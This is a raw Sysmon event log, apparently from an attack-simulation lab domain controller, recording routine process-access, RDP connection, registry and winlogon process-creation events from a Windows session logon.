Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.885{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:11.993{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000009657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localRDP2021-01-18 13:58:11.884{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.90.199.65-59764-false10.0.1.14win-dc-495.attackrange.local3389ms-wbt-server 13241300x80000000000000009713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 
13241300x80000000000000009712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000009711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000009710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x80000000000000009708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000009707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:14.852{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 13241300x80000000000000009706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000009705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000009704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000009703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000009702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x80000000000000009701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000009700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:14.836{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 10341000x80000000000000009699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:14.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.774{59A5CD1D-93F6-6005-E504-00000000A301}45482604C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x80000000000000009683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.771{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® 
Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{59A5CD1D-93F6-6005-E504-00000000A301}4548C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000007c 10341000x80000000000000009682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.758{59A5CD1D-8E42-6005-0200-00000000A301}4484744C:\Windows\System32\smss.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:14.758{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E604-00000000A301}4888C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
